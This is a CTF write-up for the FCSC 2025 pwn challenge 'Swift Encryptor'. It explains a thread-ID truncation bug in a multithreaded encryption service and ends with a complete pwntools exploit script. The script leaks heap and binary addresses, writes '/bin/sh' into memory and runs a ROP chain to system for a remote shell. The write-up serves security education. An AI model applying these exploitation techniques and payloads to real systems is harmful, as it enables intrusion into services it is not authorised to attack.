FCSC 2025 - Swift Encryptor - Pwn

13 minute read

FCSC 2025 - Write-up - Pwn - Swift Encryptor

Description

!!! New !!! Ultra-modern encryption service: Military grade post-quantum cryptographic algorithms! Ultra-fast multi-threading! Protection against memory corruption!

Author : Quanthor_ic

Solution

Context

For this challenge we are given the source code and the Dockerfile. The target is a userland 64-bit ELF binary on the x86-64 architecture.

The program is multithreaded :

// Entry point: prints the banner, starts the four main threads, waits for the
// interface thread to finish, then destroys all four threads.
int main(void) {
  // Make stdin and stdout unbuffered.
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);

  // The banner is printed through a shell command (toilet, falling back to echo).
  // Because of this call, system() is imported by the binary.
  system("BANNER='Swift Encryptor'; command -v toilet > /dev/null && toilet -f emboss -F border $BANNER || echo \"\n$BANNER\n\"");

  // One thread per pipeline stage, each registered under its TID_* id.
  create_thread(TID_INTERFACE, &interface_thread);
  create_thread(TID_DECODER, &decoder_thread);
  create_thread(TID_SPLITTER, &splitter_thread);
  create_thread(TID_ENCODER, &encoder_thread);

  // Only the interface thread is joined: main blocks here until it returns.
  pthread_join(MAIN_THREADS[TID_INTERFACE]->pthread, NULL);

  destroy_thread(TID_INTERFACE);
  destroy_thread(TID_DECODER);
  destroy_thread(TID_SPLITTER);
  destroy_thread(TID_ENCODER);

  return 0;
}

The first thing to notice here is the call to the system function: because the binary imports it, it has a PLT/GOT entry in the program. So the exploit may not need a libc leak; a leak of the binary's base address is enough.

In a while loop, the program reads base64 input, decodes it, encrypts it, re-encodes the result in base64 and sends it back to the user.

Each step of the process is done by a dedicated thread. For example, the interface thread reads the input and sends it to the decoder thread :

// [...]
  while (thread->stop == 0) {
    fputs("> ", stdout);
    if (fgets(input, MAX_INPUT_SIZE, stdin)) {
      if (input[0] == '\n') {
        printf("[%s] %s\n", THREAD_NAMES[TID_INTERFACE], ERRMSG);
        continue;
      }

      size = strlen(input);
      if (input[size-1] == '\n') {
        input[size-1] = 0;
      } else {
        size ++;
      }

      printf("[%s] %s\n", THREAD_NAMES[TID_INTERFACE], OKMSG);

      s_msg = create_msg(TID_INTERFACE, TID_DECODER, size);
      memcpy(s_msg->data, input, size);
      send_msg(s_msg);

      bool wait = true;
      while (wait) {
        r_msg = recv_msg(thread);
        if (r_msg != NULL) {
          if (r_msg->data[0] == 1) {
            wait = false;
          }
          printf("[%s] %s\n", THREAD_NAMES[r_msg->src], r_msg->data+1);
          free(r_msg);
        }
      }
    } else {
      break;
    }
  }
// [...]

The decoder decodes the data and sends it to the splitter thread :

// [...]
  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      enc_size = strlen(r_msg->data);
      if (enc_size > 0) {
        dec_size = (enc_size * 3) / 4;
        dec = malloc(dec_size);
        int res_size = b64decode(r_msg->data, enc_size, dec, dec_size);

        if (res_size < 0) {
          s_msg = create_msg(TID_DECODER, TID_INTERFACE, sizeof(ERRMSG)+2);
          s_msg->data[0] = 1;
          strncpy(s_msg->data+1, ERRMSG, sizeof(ERRMSG)+1);
          send_msg(s_msg);
        } else {
          s_msg = create_msg(TID_DECODER, TID_INTERFACE, sizeof(OKMSG)+2);
          s_msg->data[0] = 0;
          strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
          send_msg(s_msg);

          s_msg = create_msg(TID_DECODER, TID_SPLITTER, res_size+2);
          *((u_short*)s_msg->data) = res_size;
          memcpy(s_msg->data+2, dec, res_size);
          send_msg(s_msg);
        }
        free(dec);
      }
      free(r_msg);
    }
// [...]

Here is the splitter_thread code part :

// [...]
  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      data_size = *((u_short*)r_msg->data);
      if (data_size != 0) {

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          destroy_thread(worker_id);
        }

        WORKERS_COUNT = 0;
        if (WORKERS != NULL) {
          free(WORKERS);
        }

        destroy_thread(TID_JOINER);

        WORKERS_COUNT = (data_size-1)/BLOCK_SIZE + 1;
        WORKERS = malloc(WORKERS_COUNT * sizeof(struct thread*));

        create_thread(TID_JOINER, &joiner_thread);

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          create_thread(worker_id, &encryptor_thread);
        }

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          s_msg = create_msg(TID_SPLITTER, worker_id, BLOCK_SIZE);
          if (BLOCK_SIZE <= data_size) {
            memcpy(s_msg->data, r_msg->data + 2 + i*BLOCK_SIZE, BLOCK_SIZE);
          } else {
            memcpy(s_msg->data, r_msg->data + 2 + i*BLOCK_SIZE, data_size); 
          }
          data_size -= BLOCK_SIZE;
          send_msg(s_msg);
        }

        s_msg = create_msg(TID_SPLITTER, TID_INTERFACE, sizeof(OKMSG)+2);
        s_msg->data[0] = 0;
        strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
        send_msg(s_msg);

        free(r_msg);
      }
    }
  }
// [...]

To send and receive messages, the program uses create_msg, send_msg and recv_msg. The create_msg function takes the source id, the destination id and the size of the message. There is one message queue per thread.

The splitter thread creates one encryptor thread per 16-byte block of decoded data and sends each block to its own thread. Here is the encryptor thread :

// XORs one block of BLOCK_SIZE bytes from dec with a fixed key and stores the
// result in enc. No length is passed in: both buffers must hold at least
// BLOCK_SIZE bytes.
void encrypt(char* dec, char* enc) {
  // Hard-coded key: 16 explicit bytes (the array also holds the literal's
  // terminating NUL). The loop below indexes it up to BLOCK_SIZE-1.
  char secret_key[] = "\x5e\x5f\xc3\x3d\xb9\x27\x6f\x6e\xd8\xd5\xce\xeb\x1e\x0e\x75\x8d";
  for (u_int i = 0; i < BLOCK_SIZE; i++) {
    enc[i] = dec[i] ^ secret_key[i];
  }
}

// Worker thread body: waits for one message, encrypts its first BLOCK_SIZE
// bytes and forwards the result to the joiner thread, then exits.
// arg is the struct thread describing this worker.
void* encryptor_thread(void* arg) {
  char enc[BLOCK_SIZE] = "";
  struct msg* s_msg;
  struct msg* r_msg;

  struct thread* thread = (struct thread*)arg;

  // Poll the queue until a message arrives or the thread is asked to stop.
  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      encrypt(r_msg->data, enc);

      // Outgoing layout: [u_short worker index][BLOCK_SIZE encrypted bytes].
      // The worker index is this thread's id minus MAIN_THREADS_COUNT.
      s_msg = create_msg(thread->id, TID_JOINER, BLOCK_SIZE+2);
      *((u_short*)s_msg->data) = thread->id - MAIN_THREADS_COUNT;
      memcpy(s_msg->data+2, enc, BLOCK_SIZE);
      send_msg(s_msg);

      free(r_msg);
      // A worker handles exactly one message and then returns.
      return NULL;
    }
  }
  return NULL;
}

The splitter also creates a joiner thread :

// Joiner thread body: collects the blocks sent to TID_JOINER into a stack
// buffer and, once WORKERS_COUNT messages have been received, forwards the
// whole buffer to the encoder thread and exits.
// arg is the struct thread describing the joiner.
void* joiner_thread(void* arg) {
  struct msg* s_msg;
  struct msg* r_msg;

  struct thread* thread = (struct thread*)arg;

  u_int joined_count = 0;
  // The buffer is sized from WORKERS_COUNT as read at thread start and lives
  // on this thread's stack (alloca).
  u_int total_size = WORKERS_COUNT * BLOCK_SIZE;
  u_char* join_buf = alloca(total_size);
  memset(join_buf, 0, total_size);

  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      // Incoming layout: [u_short block index][BLOCK_SIZE bytes].
      // The index comes straight from the message and is not checked against
      // WORKERS_COUNT before being used to compute the destination.
      u_short offset = *((u_short*)r_msg->data);
      memcpy(join_buf + offset * BLOCK_SIZE, r_msg->data+2, BLOCK_SIZE);
      joined_count++;

      free(r_msg);

      // Completion is decided by the number of messages received, not by
      // which block indexes were seen.
      if (joined_count == WORKERS_COUNT) {
        // Status message for the interface thread (first byte 0, then OKMSG).
        s_msg = create_msg(TID_JOINER, TID_INTERFACE, sizeof(OKMSG)+2);
        s_msg->data[0] = 0;
        strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
        send_msg(s_msg);

        // Outgoing layout to the encoder: [u_short total size][joined data].
        total_size = WORKERS_COUNT * BLOCK_SIZE;
        s_msg = create_msg(TID_JOINER, TID_ENCODER, total_size+2);
        *((u_short*)s_msg->data) = total_size;
        memcpy(s_msg->data+2, join_buf, total_size);
        send_msg(s_msg);
        return NULL;
      }
    }
  }
  return NULL;
}

The joiner thread receives every 16-byte block produced by the encryptor threads and copies each one into a result buffer. Once all the blocks have arrived, it forwards the buffer to the encoder thread, which base64-encodes it and sends the result to the interface thread.

To finish the interface thread prints the result.

Here is a little schema to summarise :

Vulnerability

There is no obvious vulnerability, so we can try sending a big payload to see whether the base64 encoding/decoding or some other part of the pipeline crashes.

# Fuzzing payload: 0x5000 bytes of "B", base64-encoded, then cut down to the
# first 0x2000 base64 characters (which decode to 0x1800 bytes, i.e. 384 blocks of 16 bytes).
pld = b"B" * 0x5000
pld = base64.b64encode(pld)[0:0x2000]

We get a nice crash in the base64 encode function: the memory it accesses is unmapped. Interesting, this might be an overflow or something similar.

We need to have a breakpoint to check the arguments :

The source size is 0x4242 (BB), our input. So we control the size passed to base64 encode ? WTF.

Let's review the source code and do some debugging. Strangely, the data reaching the encoder has not been encrypted (XORed) by an encryptor thread. If we look closer at the splitter function, there is an important detail.

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          s_msg = create_msg(TID_SPLITTER, worker_id, BLOCK_SIZE);

Each message is sent to an encryptor thread identified by its ID (worker_id). But here is the create_msg signature :

struct msg* create_msg(u_char src, u_char dst, u_int size)

The destination id is a u_char, stored in a single byte. The assembly confirms that the id passed to the function is truncated to one byte. However, the i variable and the WORKERS_COUNT variable are both stored on 32 bits, so worker_id can be greater than 0xff.

There is a clear integer overflow (truncation) vulnerability: the cast from 32 bits to 8 bits makes the destination id wrap around modulo 256.

In IDA :

The movzx eax, al instruction performs the truncation; in the decompiler view we can also see the unsigned __int8 cast.

What are the ids of the threads :

#define TID_INTERFACE 0
#define TID_DECODER 1
#define TID_SPLITTER 2
#define TID_JOINER 3
#define TID_ENCODER 4

In our crash, the truncated destination id was 4, which is the encoder's id. This means a message was sent directly from the splitter to the encoder, which never happens in the normal flow.

This vulnerability allows us to send an arbitrary 16-byte message to every other thread: because i iterates over all the ids, once worker_id wraps around, one block is delivered to each of the main threads.

By making the id wrap around several times, we can send several arbitrary messages to the other threads.

Exploit - Abuse of arbitrary message sending

Now our goal is to find useful behaviour after thread message reception to gain more primitives, read and write.

The joiner thread looks like a great target to write data :

    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      u_short offset = *((u_short*)r_msg->data);
      memcpy(join_buf + offset * BLOCK_SIZE, r_msg->data+2, BLOCK_SIZE);
      joined_count++;

There is an out of bound write possibility.

The offset is passed in the first two bytes of the messages. The join_buf variable is on the stack, allocated by alloca, which is a sub rsp, size . The size is the total of data the thread is going to receive. (Total data block encrypted.)

By controlling offset, we can obviously overwrite the return address of the thread by setting offset to a greater value than the alloca size.

But now we need a leak of address to progress in the exploit.

The base64 encode functionality looks like a good way to get one :

      dec_size = *((u_short*)r_msg->data);
      if (dec_size > 0) {
        enc_size = (((dec_size - 1) / 3) + 1) * 4 + 1;
        enc = malloc(enc_size);
        int res_size = b64encode(r_msg->data+2, dec_size, enc, enc_size);

The size is read from the first two bytes of the message which, as we have seen before, we control. It is used as the source length of the data to encode, and the size of the encoded output is computed from it.

If we set a big size in entry, we could leak data after our message. Our message is allocated in the heap.

We set the length to 0x100 for example. (Those 2 bytes are used as length with the message sent to encoder thread as we explain before)

# 0xff0 bytes of padding, then the 16-byte block that ends up in the encoder's
# queue: its first two bytes (0x100) are read by the encoder as dec_size.
pld = b"A"*0xff0 + p64(0x100)

pld = base64.b64encode(pld)[0:0x2000]

sla(b"> ", pld)
# Take the second-to-last line received before the next prompt, keep the field
# after the first space (the base64 output) and decode it.
leak = base64.b64decode(rcu(b">").split(b"\n")[-2].split(b" ")[1])

print(leak)

We get some leaks :

Checking in GDB, we see that some stale heap pointers are left after our message, and we leak them. Each run produces slightly different results, probably because the operations of the different threads are not interleaved in the same order on every run.

On some runs, we can leak the next pointer of a singly linked free list in the heap (probably tcache or fastbin). With the safe-linking protection, this pointer is stored XORed with a shifted heap address. But if we leak the last element of the list, its next pointer is 0, so the stored value is just the shifted heap address, which gives us a heap pointer/the heap base of the thread.

We could send a big size and play with our input characters which are placed on the heap to retrieve our leaks more easily.

But we still have no libc leak or binary leak, and we need a binary leak to call the system function.

How to do it ?

One idea was to abuse the joiner thread. Because the join_buf pointer returned by alloca is saved on the stack, overwriting it would give us an arbitrary write and an arbitrary read. Arbitrary write because each message received by the joiner is copied (memcpy) relative to join_buf, and arbitrary read because, once all the data has been received, the content of join_buf is encoded and printed.

There are pointers into .text left on the heap before our leak position; if we make join_buf point before our heap leak, we may leak them.

The catch is that we also need to overwrite joined_count. This variable counts the messages received so far and tells the joiner when all the data has arrived. Because of the vulnerability, some blocks never go through an encryptor thread to the joiner, so the counter stays below WORKERS_COUNT (the total number of blocks). With the out-of-bounds write, we can set it to a suitable value. The problem is that each write covers 16 bytes (of which we control 14, because the first 2 bytes of our message are consumed as the offset), and the variable next to joined_count on the stack is the thread pointer, whose stop field tells the thread whether it must stop. If we overwrite that pointer, the thread crashes when it dereferences it. However, if joined_count immediately has the right value, the function returns and there is no crash.

Note that joined_count has to be overwritten before join_buf, because the out-of-bounds write is relative to join_buf.

Actually, this technique may still work, because the two most significant bytes of the fake thread pointer are null anyway: we could overwrite only the 6 low bytes of the thread pointer and make it point to a heap value. But during the CTF I failed to get it working (late night scripting x)) and tried another idea.

Another idea was to play with allocations to get more interesting data onto the heap and leak it. And indeed, after sending a large amount of data over multiple messages, some encryptor_thread function pointers are left on the heap within reach of our base64-encode leak. They are written when the threads are created. We need to search the leak for a known byte pattern to find them reliably on every run.

So we have a leak, next we need to overwrite the return address of joiner thread with our ROP.

The only trick here is to place a "/bin/sh" string at a known address, to use it as the argument of system. To do this we can use the arbitrary-write technique described above: because we have leaked the base address of the binary, we can point join_buf at the BSS and write "/bin/sh" there.

Like this (with one message) :

def write_binsh():
    """Write the string "/bin/sh" into the binary's writable data at exe.address+0x50c0.

    The payload carries two 16-byte blocks destined for the joiner (offsets
    0xfe0 and 0x1fe0, which are 0x1000 bytes = 256 blocks apart). The first
    one redirects join_buf, the second one writes the string through it.
    Requires exe.address to be set to the leaked base beforehand.
    """
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        # joiner: block index 0x2440//16 targets the saved join_buf pointer (per the
        # write-up); the 6 low bytes of the new pointer are followed by zero bytes.
        0xfe0:  p16(0x2440//16) + p64(exe.address+0x50c0)[:-2] + p64(0),  # joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        # joiner: block index 0 of the redirected join_buf; 4 padding bytes, then the string.
        0x1fe0:  p16((0x0)) + b"C"*4+b"/bin/sh\x00",
        0x1ff0: p64(0x0),  # encoder
    }, filler=b"B",length=0x3000)

    # Only the first 0x3000 base64 characters are sent.
    pld = base64.b64encode(pld)[0:0x3000]
    sl(pld)
    rcu(b">")

The first joiner message overwrites join_buf, and the next joiner message (sent by making the id wrap around again) writes our data (containing "/bin/sh") at offset 0 of the new join_buf.

To get the shell here it is :

def shell(pop_rdi):
    """Send the final payload that writes the ROP chain over the joiner's stack.

    pop_rdi is the address of a "pop rdi; ret" gadget. The addresses binsh,
    ret and system are read from module-level globals, which must be set
    before calling this function.

    Three 16-byte joiner blocks are sent, each 0x1000 bytes (256 blocks) apart
    in the payload. After the 2-byte block index, each carries one full 8-byte
    value followed by the 6 low bytes of a second value.
    """
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        # join_buf+0x3060: dummy value, then the pop rdi gadget
        0xfe0:  p16(0x3060//16) + p64(0xdead) + p64(pop_rdi)[:-2], #joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        # join_buf+0x3070: "/bin/sh" address (popped into rdi), then a plain ret gadget
        0x1fe0:  p16(0x3070//16) + p64(binsh) + p64(ret)[:-2], #joiner
        0x1ff0:  p64(0x0) + p64(0x0),  # encoder

        0x2fd0: p64(0x0)*2,  # splitter
        # join_buf+0x3080: address of system
        0x2fe0:  p16(0x3080//16) + p64(system) + p64(system)[:-2], #joiner
        0x2ff0:  p64(0x0),  # encoder

    }, filler=b"B")

    pld = base64.b64encode(pld)
    print(len(pld))
    sl(pld)

We choose offsets beyond the alloca allocation so that the writes land on the return address of the joiner thread (the chain starts at offset 0x3060). A "pop rdi; ret" gadget loads the address of "/bin/sh" into rdi, then we return into system and get a shell (don't forget the extra ret gadget, which realigns the stack to avoid the movaps issue).

We get the shell when all data is read and when the joiner thread is killed (it returns normally) by the splitter.

Some buffering problems but it works :)

Conclusion

It was a very nice challenge: it's not common to see a pwn challenge involving threads, and so many of them. The vulnerability was tricky and gives a very original primitive ! Thanks to Quanthor_ic for the challenge !

Bonus

I didn't mention it, but the challenge was a bit hard to debug: there were many running threads and my gef was laggy. I used a lot of conditional breakpoints to skip the calls I didn't want : break *0x555555555690 if $rsi == 0

In this case we break on the send_msg call only when $rsi is equal to 0, which is when the integer overflow occurs. We can rely on this to see which step of the exploit we have reached.

Full script

Here is the full exploit script with a bit of cleaning :

#!/usr/bin/env python3
from pwn import *
import base64
import time

"""

"""
# Terminal command pwntools uses when it has to open a new window (e.g. for GDB).
context.terminal = ["tmux", "new-window"]

# Target binary; exe.address is rebased later with the leaked base address.
exe = ELF("./swift-encryptor_patched")
# rop = ROP([bin,libc])

context.binary = exe
# Tube to the target; assigned by conn().
io = None

def one_gadget(filename, base_addr=0):
    """Return the offsets reported by the `one_gadget` tool, rebased by `base_addr`.

    Runs `one_gadget --raw -l0 <filename>` and parses its whitespace-separated
    decimal output.

    :param filename: path of the library/binary to analyse.
    :param base_addr: value added to every offset (0 keeps raw offsets).
    :return: list of ints; empty when the tool prints nothing.
    :raises subprocess.CalledProcessError: when the tool exits with an error.
    """
    # Local import: do not depend on `from pwn import *` re-exporting subprocess.
    import subprocess

    raw = subprocess.check_output(['one_gadget', '--raw', '-l0', filename]).decode()
    # split() without argument ignores the trailing newline and repeated blanks,
    # and yields [] (instead of ['']) when the output is empty.
    return [int(tok) + base_addr for tok in raw.split()]


def logbase():
    """Log the libc base address."""
    # NOTE(review): no `libc` object is defined in the visible script, so this
    # helper would raise NameError if it were called -- confirm before using it.
    base = libc.address
    log.info("libc base = %#x" % base)


def logleak(name, val):
    """Log a leaked value as `<name> = 0x...`."""
    formatted = " = %#x" % val
    info(name + formatted)


def sla(delim, line):
    """Wait for `delim` on the tube, then send `line` followed by a newline."""
    result = io.sendlineafter(delim, line)
    return result


def sl(line):
    """Send `line` followed by a newline."""
    result = io.sendline(line)
    return result


def rcu(delim):
    """Receive data up to and including `delim`."""
    data = io.recvuntil(delim)
    return data


def rcv(number):
    """Receive up to `number` bytes."""
    data = io.recv(number)
    return data


def rcvl():
    """Receive a single line."""
    data = io.recvline()
    return data


def conn():
    """Open the tube to the target, store it in the global `io` and return it.

    `GDB` on the command line starts the binary under gdb, `REMOTE` connects
    to the challenge server; otherwise the binary is started as a local process.
    """
    global io

    if args.GDB:
        script = '''
        #init-pwndbg
        init-gef
        #decompiler connect ida --host 127.0.0.1 --port 3662
        c
        '''
        io = gdb.debug([exe.path], gdbscript=script)
        return io

    if args.REMOTE:
        io = remote("fcsc.fr", 2104)
        return io

    io = process([exe.path])
    return io


conn()

def leak_base():
    """Leak an encryptor_thread pointer from the heap and return the binary base.

    Steps:
      1. Send two kinds of payload whose 16-byte block at 0xff0 is delivered to
         the encoder; its first two bytes are used as the length to
         base64-encode (0x100, then 0x4000), so heap data located after the
         message is echoed back.
      2. Send dummy lines until a response longer than 0x200 bytes arrives.
      3. Decode the base64 output, find a known pair of qwords (0x120, 0x84)
         and read the function pointer stored 24 bytes after the match.

    :return: leaked pointer minus the offset of encryptor_thread in the binary.
    :raises RuntimeError: when the marker is not present in the leak (the heap
        layout differs between runs; re-run the exploit).
    """
    # Offset of encryptor_thread from the base of the binary.
    encryptor_thread_offset = 0x2119

    # The original dict listed key 0xfd0 twice; only the last value of a
    # duplicated key is kept by Python, so the shadowed entry is dropped here.
    pld = flat(
        {
            0xfc0: p64(0x0)*2,
            0xfd0: p64(0x20) + p64(0x0),  # splitter
            0xfe0: p64(0x10)*2,  # joiner
            0xff0: p64(0x100) + p64(0x0),  # encoder

            0x1ff0: p64(0x1),  # encoder
        }, filler=b"A") + b"B"*30

    pld2 = flat(
        {
            0xfc0: p64(0x0)*2,
            0xfd0: p64(0x20) + p64(0x0),  # splitter
            0xfe0: p64(0x10)*2,  # joiner
            0xff0: p64(0x4000) + p64(0x0),  # encoder
        }, filler=b"A") + b"B"*30

    pld = base64.b64encode(pld)
    pld2 = base64.b64encode(pld2)

    # The sleeps give the threads time to process each request.
    sla(b"> ", pld)
    time.sleep(0.2)

    sla(b"> ", pld)
    time.sleep(0.2)
    sla(b"> ", pld2)
    time.sleep(0.5)
    rcu(b">")

    # Poke the service with dummy input until the large encoded leak shows up.
    for i in range(30):
        time.sleep(0.2)
        sl(b"a")
        leak = rcu(b">")
        print(leak)
        if len(leak) > 0x200:
            break

    print(leak)
    print(leak.split(b"\n")[-2])
    # Second-to-last line, field after the first space: the base64 output.
    leak = base64.b64decode(leak.split(b"\n")[-2].split(b" ")[1])
    print(leak)

    marker = b"\x20\x01\x00\x00\x00\x00\x00\x00" + b"\x84\x00\x00\x00\x00\x00\x00\x00"
    pos = leak.find(marker)
    if pos < 0:
        # find() returns -1 on failure; slicing with it would silently yield a
        # garbage address, so fail loudly instead.
        raise RuntimeError("encryptor_thread marker not found in the heap leak, re-run the exploit")

    leak_text = u64(leak[pos+24:pos+32])  # encryptor_thread
    print(hex(leak_text))

    return leak_text - encryptor_thread_offset


def write_binsh():
    """Write the string "/bin/sh" into the binary's writable data at exe.address+0x50c0.

    The payload carries two 16-byte blocks destined for the joiner (offsets
    0xfe0 and 0x1fe0, which are 0x1000 bytes = 256 blocks apart). The first
    one redirects join_buf, the second one writes the string through it.
    Requires exe.address to be set to the leaked base beforehand.
    """
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        # joiner: block index 0x2440//16 targets the saved join_buf pointer (per the
        # write-up); the 6 low bytes of the new pointer are followed by zero bytes.
        0xfe0:  p16(0x2440//16) + p64(exe.address+0x50c0)[:-2] + p64(0),  # joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        # joiner: block index 0 of the redirected join_buf; 4 padding bytes, then the string.
        0x1fe0:  p16((0x0)) + b"C"*4+b"/bin/sh\x00",
        0x1ff0: p64(0x0),  # encoder
    }, filler=b"B",length=0x3000)

    # Only the first 0x3000 base64 characters are sent.
    pld = base64.b64encode(pld)[0:0x3000]
    sl(pld)
    rcu(b">")

def shell(pop_rdi):
    """Send the final payload that writes the ROP chain over the joiner's stack.

    pop_rdi is the address of a "pop rdi; ret" gadget. The addresses binsh,
    ret and system are read from module-level globals, which must be set
    before calling this function.

    Three 16-byte joiner blocks are sent, each 0x1000 bytes (256 blocks) apart
    in the payload. After the 2-byte block index, each carries one full 8-byte
    value followed by the 6 low bytes of a second value.
    """
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        # join_buf+0x3060: dummy value, then the pop rdi gadget
        0xfe0:  p16(0x3060//16) + p64(0xdead) + p64(pop_rdi)[:-2], #joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        # join_buf+0x3070: "/bin/sh" address (popped into rdi), then a plain ret gadget
        0x1fe0:  p16(0x3070//16) + p64(binsh) + p64(ret)[:-2], #joiner
        0x1ff0:  p64(0x0) + p64(0x0),  # encoder

        0x2fd0: p64(0x0)*2,  # splitter
        # join_buf+0x3080: address of system
        0x2fe0:  p16(0x3080//16) + p64(system) + p64(system)[:-2], #joiner
        0x2ff0:  p64(0x0),  # encoder

    }, filler=b"B")

    pld = base64.b64encode(pld)
    print(len(pld))
    sl(pld)

# Step 1: leak a .text pointer and rebase the ELF object on the computed base.
exe.address = leak_base()
#exe.address = 0x555555554000

print(hex(exe.address))

# pause()

# Step 2: place "/bin/sh" at a known address inside the binary.
write_binsh()

# write_binsh() stores b"CCCC/bin/sh\x00" at exe.address+0x50c0, so the string
# itself starts 4 bytes further.
binsh = exe.address+0x50c0+4

pop_rdi = exe.address + 0x00000000000020ad # pop rdi ; ret
ret = exe.address + 0x000000000000101a  # plain ret gadget
system = exe.sym["system"]

#pause()
# Step 3: shell() reads binsh, ret and system as globals, so they must be
# defined before this call.
shell(pop_rdi)

io.interactive()